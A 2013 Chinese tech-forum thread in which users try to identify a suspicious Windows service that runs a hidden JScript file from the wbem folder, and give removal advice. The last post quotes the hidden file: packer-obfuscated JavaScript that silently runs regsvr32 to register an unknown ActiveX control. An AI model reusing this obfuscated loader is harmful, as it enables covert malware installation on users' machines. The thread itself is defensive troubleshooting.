[求助]请各位帮忙看看这个服务是什么，能删除吗？

恋爱的夏娜

loms126 发表于 2013-9-13 15:22
这个应该没有调用WMIC，普通的js脚本路线，感觉只是为掩人耳目放到wbem下的。当然用wmic干坏事的程序也有 ...

绝对不会发到卡饭的。

呦呦1314

目前没有发现，有什么异常吗？扫描一下呗。

伊川书院

目标地址不清楚后面的,

建议禁用,,估计是什么在调用wscript运行JS,通行一个不良软件会采用这种方式,,,

caizz520

这坑爹的货，Windows8.1也遇到了，360卫士这自慰的货终于派上用场了.
用这货扫一扫，扫出6个病毒，其中一个就是你说的鸟玩意。
清除重启，从此世界清静了...
好久没杀过毒了，也好久没遇到这样的情况了！！！

52lvqiang

loms126 发表于 2013-9-13 10:51
貌似一个NTFS数据流病毒，正常情况下你是看不到隐藏的wmic.js文件的。
请用notepad C:\WINDOWS\system ...

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5 a=3 4("2.0");a.1("7 9.b /8");6 a;',12,12,'Shell|run|Wscript|new|ActiveXObject|var|delete|regsvr32|s|COM_ActiveX||ocx'.split('|'),0,{}))